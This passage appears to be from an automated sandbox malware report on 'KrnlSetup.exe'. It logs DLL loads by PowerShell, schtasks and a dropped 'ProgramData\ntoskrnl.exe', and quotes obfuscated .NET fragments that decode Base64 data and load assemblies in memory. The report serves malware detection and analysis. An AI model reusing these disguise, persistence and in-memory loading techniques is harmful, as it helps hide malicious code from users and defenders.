                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: version.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: version.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: version.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\ntoskrnl.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                                    Source: ntoskrnl.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\ntoskrnl.exe
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: KrnlSetup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: KrnlSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.aXR8CuhiUox9pjrQs8F2XZGCXHBUe6p9t,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.vKVmfO4Ax2hknrWFqsEOTHlHT3atERGAh,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm._337gb0bcRj1Fe4BRfkLfiIOoAuIUBiiuV,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.VZqaUTpyJP1QEyzwtq6vJz1rjboWx0Ebl,ZErofTOG7QyG2YqbzUeXCBXVgf.EI90XyScDOpIXlVEju0Rm2SCJH()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2],ZErofTOG7QyG2YqbzUeXCBXVgf.p8hj3UOnEV6guk8AAEMp8hQ6vI(Convert.FromBase64String(SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.aXR8CuhiUox9pjrQs8F2XZGCXHBUe6p9t,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.vKVmfO4Ax2hknrWFqsEOTHlHT3atERGAh,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm._337gb0bcRj1Fe4BRfkLfiIOoAuIUBiiuV,nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.VZqaUTpyJP1QEyzwtq6vJz1rjboWx0Ebl,ZErofTOG7QyG2YqbzUeXCBXVgf.EI90XyScDOpIXlVEju0Rm2SCJH()}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2],ZErofTOG7QyG2YqbzUeXCBXVgf.p8hj3UOnEV6guk8AAEMp8hQ6vI(Convert.FromBase64String(SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { SQlBU6hKSoWFjQZlvSPUteh54WrjfAQjQN4OP3FawJInThLrua9[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                                    .NET source code contains potential unpacker
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg System.AppDomain.Load(byte[])
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5 System.AppDomain.Load(byte[])
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg System.AppDomain.Load(byte[])
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5 System.AppDomain.Load(byte[])
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.cs.Net Code: yXX3u9IVgTPCIDGP4x8Ag6NIv9iWWYrcYHxfy4MHB49XsIrAOW5
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeCode function: 0_2_00007FFD9B7800BD pushad ; iretd 0_2_00007FFD9B7800C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B65D2A5 pushad ; iretd 1_2_00007FFD9B65D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7700BD pushad ; iretd 1_2_00007FFD9B7700C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B842316 push 8B485F93h; iretd 1_2_00007FFD9B84231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B64D2A5 pushad ; iretd 4_2_00007FFD9B64D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7600BD pushad ; iretd 4_2_00007FFD9B7600C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B832316 push 8B485F94h; iretd 4_2_00007FFD9B83231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B66D2A5 pushad ; iretd 9_2_00007FFD9B66D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B78BAE8 push E85A8CD7h; ret 9_2_00007FFD9B78BAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B78B9FA push E85A8CD7h; ret 9_2_00007FFD9B78BAF9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B7819D4 pushad ; ret 9_2_00007FFD9B7819E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B7800BD pushad ; iretd 9_2_00007FFD9B7800C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B852316 push 8B485F92h; iretd 9_2_00007FFD9B85231B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B65D2A5 pushad ; iretd 11_2_00007FFD9B65D2A6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7700BD pushad ; iretd 11_2_00007FFD9B7700C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B842316 push 8B485F93h; iretd 11_2_00007FFD9B84231B
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 15_2_00007FFD9B7600BD pushad ; iretd 15_2_00007FFD9B7600C1
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 16_2_00007FFD9B7600BD pushad ; iretd 16_2_00007FFD9B7600C1
                                    Source: C:\ProgramData\ntoskrnl.exeCode function: 17_2_00007FFD9B7800BD pushad ; iretd 17_2_00007FFD9B7800C1
                                    Source: KrnlSetup.exe, tASLOpZvl7GGRJYWR4yIssW5kl.csHigh entropy of concatenated method names: '_7ssMBjEKbahFh3EoLQhI7V3fxT', 'IrPPxYwUhykeHZLyQHxJvo4mk0', 'hXgmLcmUofQeGwBxl47jkEk7BJ', '_9VF7gkkkTnq68qDA6LFTfJXoMN1WdDcGh205zycGb1LFckg9elhljtalKdfPYBqviFtXSgPWCC6cC7', 'IYZZN37JjyxjpV4hFnvoUKnJBIyEkMbVxOb1kxCTB0owlsyHMVnABlvx7CeAQKyTE9ej93emQ3l0YW', 'uiOIRcaMOND9Q1dqvNWA8B25lCIht1T4SteHBcmeFBaBdEggFFz5dK2JwGTUPXmMn0FtEbQbJpOqT1', 'paGaBerULx3vQuVa8ni2PhN6mO4xhNmS4mwEKBupiWdEFyW3jrLuQsynSnMwk63mENIhw3XoBwElbJ', 'JmGf0iehP7BRsB5GmcZL9NMlIrG0Drpyh1rmCm9ofeyUk10SNojjBdlerbL3yq7AZOaXSDfXsKp0aE', 'HkxSSRe4zmsdVH6SeuietRGiWooRix4icowlAyr3MpZYlHcaXUnQJrJyryzfgay8tQEAVnrW0cbBGq', 'E13gGu54ryvNILSdZ09LhjcTUPvW0hZzAVK17F8XMNTH3YGPpipRvXyOUn40cSjm5y4PgUB3RGuZj5'
                                    Source: KrnlSetup.exe, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.csHigh entropy of concatenated method names: 'sikTj4Sabcae10kVCtmOsj21C8R3ET0y4hXzMlGUdjU', 'F51TEnYgWJkMTWdtDT9rvhyduzKP0VIU2IBoaWnDXhL', 'Zg6HONjk3u3JP3RRn0QDL1gDrtCkhRDYeuvroY9jpjv', 'Hg1lEVv05lei546bFSAA7AR1dV1aNfYpuZtMSf8aHt2'
                                    Source: KrnlSetup.exe, cYX3OVhpLcA6pdQrK6x1pst8eZqf4OHXsSZvSKZX5QjcDyvssaTBTBt6QsMiumjxTz1UegqCK2fu4L22QvQnJFxcwLF.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZGODKwtqkVbl63Si4J0b2IaskUEMLkfXUV1iqqMMxP1', '_96N0MdkYcRl39KtkJ0RIZmhL5BF7iZPKwPhtiY5yvz1', 'HcFxIT6VBJ0H2ApcxRgUD7DLuDNF1LQp8Txz1cJ0R6R', 'NwNozcGMHIOB8u8pTRepwD56kki98CuKR71BTWAXLIk'
                                    Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csHigh entropy of concatenated method names: 'pSD1lTqKZN7Sl6F073o5tcR2PxeiIFvKDhf3anKtyOAOmhTtSU6rBDZYJMNT5u0hVZ', 'veIZW0otddqoNKMbpvtqYGXIxXSSfF2hoTf9RbKFoAjHoM5OMtMWA1xNssME7o23Pi', 'gRbeiKLTfmcejQa1OqWejXIQUXvEnYRL46vrE3Wl3rljyuGEWuY3tLymgOUYNga9OD', 'Issh3FdMrPAdzw6kcdXr9tiwq3C5FPnsy5JvMlQ2oLQHCD1IHkqTLwsKFEJqL1TnOs', 'p2RhKecevXMbvidAAjsCf30k2rMzxwYB6tsxuf2eY4WWV9oXTeHbHEkNQQzhNRKO9p', 'FM1yLqYdQXX2BoXnIHpdzmJELCtu2Jay7ertowYpif535YkTaa31rlQhn8iaYTWLTW', '_5XPWgRAWsQZ36DdryyJuoq2LFS7S8SHUtFVUVaTX25fBj0QRfmAZabD3IS3DWvDpEx', 'mTjgvlSX2fRy8UMAAhPWUKg8HbaRUFx7WeaJdNC6sJrO6mNo4px7LY8L04IiIEelms', '_9dpsXVdx9VWhNQ1wYPFXwXyfXhxgjtn6S1DFo4B9phXPumFhvcrgc1RENXk5m116t7', 'adPkIZkUvgKz0ds1tzEtJea9zaVNbvPPUOI1fYAHquC4K2zlKZEgM5l3xd97w1ceLG'
                                    Source: KrnlSetup.exe, plgxVns32E432OP91wDLjvcriYG7qgPnLar39J7oUOj4gvPqT27.csHigh entropy of concatenated method names: '_5geOxBePcHi8fC3aDPbGoQ6JtzoLVCrhtafghF2u2uHEar2WFdE', 'VCSM48aD5KtdYb8bOBImpC2j67UwJ3L33joXl3uP7jgt0fBPEt24KtUTIEnXEv8uQu232OWH1MPpu1BbUta', 'Xdswxyqchr8KZ3sBmxHCbSAymEkKV5ov5FMM9nZAVownMzQHWuTb6dmzVCmR8hhfi274cl02yvfOaiTLy8T', 'LhIjSlMgRdBXIPsGX4MiqT9xh9YiwppQTd9PaXhfylx6DXrhq3nuvsCkIXnKss6SHtMaOh7yeacf2YhHgZL', '_5VRbpqAFTaQgm51y5QtkvW2Tm4fwJa6s8OlTN0XpGqCOtb2JfIzW7M4S794fopRJ1b0P4qgD4HFKl2AYXRQ', 'OD3xGY99UgG1dmE9G4PZeRSFLoWN3XX4X05VdkjxPNZtZVApgm4ZCU5Mvv178NR8BlYO4giVUqvZyp13TAO', 'pvYh3zjNVGQro5CnRnILLZbBXDddYhuK3kHq4QxJ70h4ZFDC0qWQ7LFpSSunFUVuGK4dOcX0kTyBLv0lopk', 'RZXwniU96hv3hM9UHDsgsLgipirp55Y2B5n9Gvni4lpki5WQSxstgqKdPRPnKfyt3AvfE6dmsu9pCM3chy5', 'g7rRJdbz0J6MnjLshSoaycTk6kXjmskFcq2JX1lQdSZ9TwNw9Tfz8zBanGTrZOgjT4gDPyhsiG84PCUy0Ak', 'SRm1sY9zI7wr8DtStICAoYyCJiCEVwXt8JtnSM8YSbS4aO4ZSvdB9fpMIPtL9eYOQzwnSOcnwnVtJHv00oj'
                                    Source: KrnlSetup.exe, OKwK7LhbT17LhFoV8nXoqDfY9C.csHigh entropy of concatenated method names: 'fZOkXT9QaQHEDxtpWtGtE5Zp0c', 'ODSElTfgUgNnpNWJYarXYD2LGCpS6k8k8tDwtnjVEgFSBGA88V9xAB3iRrnM4OyzgiLSBIya4tQjDo7MiJAv6Ob5s2GN4', 'BvCqdj21pcOuqP2KqeHnk9mnkQZazPaXzqBLtEsNRF7ckxBzV8ctV2zwWGobDLw10K47T266LDMOTtaBk1AVbqxniFBik', 'kTZC3zUk9yV2Lg94BFRKKkWVecaOlzcCA71elt9PtZ9DjS7qmpoimxP1BMwy56wpQddwmtgdmT7zmiNN04p26tdPpBigY', 'ZCYtJZr3a6i7mWNP8wU95OaeldFhQbSKoFcUeYCjUduxeruKjeYJIZGdBZz4yu4LnKxt6p2SRBjY8BrdECELJXLbhYHtB'
                                    Source: KrnlSetup.exe, 68QERigio3OYDoczrnvFbx6mMZ.csHigh entropy of concatenated method names: 'cw1Ye58i3sEWiVbc7pm0Ea6TMg', 'GbqXPEy94PYWQcuTw5tcq564CV', 'rLspw77oxv1WXq1PytR5dn7QHx', 'zaHEgI74aLxoj9n5UKM9E8vDZ3', 'nhzNzUjKDt3FkWychg4sePDkSxLPPUxChvFNhYTK0susVTuNWlwLhmwPQGoyj', 'ZFu5YMSYHc4IGdp2pdgdtfSWSIHMYQFippvBk8M1BcebkWB0CfMDxOT0kFTHJ', 'G8y8C1BCYxs7NfNc5IXA4o340lAfA2zsBpE4koXcEqxoI4vGcIhKaz77Y4YcP', 'w5PXLvTZa7GwEqkRyJ5T63IW6IMVxypAdgg0zmjttP7RvRAE8hKavpBoD2IDy', 'S76gv8uCSBTOueaICU6xRdIv1JcZVjT9tlMBT3lbPx2G6EE3K3StMW4XiVohN', 'NBWKErPt2cVkpKVJckBt7gD0eDiYGkPMUHWCGbcxDLVszKv6wQ9xx0uUN0A5R'
                                    Source: KrnlSetup.exe, Wrga4JIQ161v6uXdIAXYuLFcsRxfHujcE.csHigh entropy of concatenated method names: 'mzIauuQBhkC9t2jnlCZuTs22XJLUZbLm9', 'gKdsa7JiZ3xDKfLcvjFqHz1rG8SgxCkaa', 'xqOQZ2IF8DwRVIGCGGnw0ZVwE7vFC4VdPzmZ4NU2Yn2kacyDPp0BPqUf47AyobOH5a', '_2Fi7imDL4I9JOwMaJXO43BvOt8ONDW3yJIDP2Y8FUpoMEnUvQ97OJusun6QLpUkj1l', 'dhH6NTfipeUhM26Uu5piVb3kCPW7apHORRSBOXHfSHXS2USBlpXUDvvHAfSfHOSd6S', 'bJMAYNQLKlBduycg3sfNzdUT5pbsDcxMEeCgcDYuod9YZ0ARw3wtxDja2SzYNMeefL', 'xfOecYlHAAD1l0jYPDSG7Ej0zVGWClcyxVLKVSu0iemzghnLzqrlTr088dEZPPbM9C', 'zW9DSk7mQCz6uQtxIrBpIweMaJrgK7pZD3IjnQuSAzALZmfxcatpVUycGU2WdYzthV', '_2UJlUmzj3wBM5EzW7frus5d7Agz0BtCJhmOMkhGKWIqkIbSPlsOcJmqTr22RpMyGI2', 'jO5DYzjOX2qOtl50autwA0LbD8sMeqQbSe2FsApjcowDmahBPpUmAJgnjihTJt5ZzX'
                                    Source: KrnlSetup.exe, LVwmQO4ax5JB4YFwVVHn5TmiZFyNcjVYW0Nn6PzcPuLC6TmagDM.csHigh entropy of concatenated method names: 'cupxcXiwCuW6tLuxq8WwSNNLIqMRP8rlGwPNdf5vdAT1llg4sCl', 'On7be7edBqgbpw6N9bHwPdt21xUwbUTreGWLAoCaosbs8uEBtO9', 'bL60cWrHdLNg6I2I2Rz24YWL66CBUGrpUvfVdnIC6TEZu3A5dUf', 'TOELTNpx29aY8smfulV6lI5BrOZK', '_9h6z2STmyr7oL17GmG13d7NakwSf', '_2c8IdUkgIMK5Wrkgbxp1McxANSJJ', 'nb3SoW2ayJjaF15EJEBS8bqB83b9rePv1a0RNejrK3khxIsUAxt7hTEX83tMM', 'CzjfK39LMMval6SShzajFiA7oROasO1R5yXpY7LDDOzXB4SvzP1jVWBvtDuOz', 'wrHbHPnx4r0zjoYis8DL9o09NLuVYvcxRLSy9qDwWOeSIPqnBLikrk5ac9o8d', 'mZnzDDWxhtU5TLvIhrm2sKbXhhRvI2zPn7kiqb4HO3O5w20eqalujaEH60uyB'
                                    Source: KrnlSetup.exe, FRsOn8xOk3xCVaucFsv91X3lefmoZdYvqD2xretC1VQ8E9yENMe.csHigh entropy of concatenated method names: 'xk7cdZedBDWBNQZFjkeYPuOfswvNWwKnaFyJEonKvxY1XZ7OnAl', 'IvIHTMylshoeX2w4QRIhyvmYu8os', 'ltIKBIggk1XTA3ijsjErkHA5EGRY', '_4KrPj7q2XCofasrLwFUvb2vgyoBQ', 'ol7IHUZAmIlurJKjy9e1MPwupAx0'
                                    Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.csHigh entropy of concatenated method names: 'uqKcLujo4ElgykH6ucSurssHoQ', 'Ovpbp5SkP6IKQ6E84Cm7rNmZij', 'fPl9sBA37MajH1ICUw3Ruok72s', 'SqaN5V8tXYmbgHpJ3wM5qEBDxB', '_4kVsLRnHFqrPhizEZ0HAgrobQl', 'gp6JKIii99RWPnt4TkKrMv5Tyw', 'RC2hydMiTzBiRbxRytYxATgJaH', 'jWphB5eHWngplbKwXBiEAzEkuG', 'jsOllqZzRJTQBMFBNmyD7rvTFh', '_9YaVQWshVMjgacH70h0sx1MXyX'
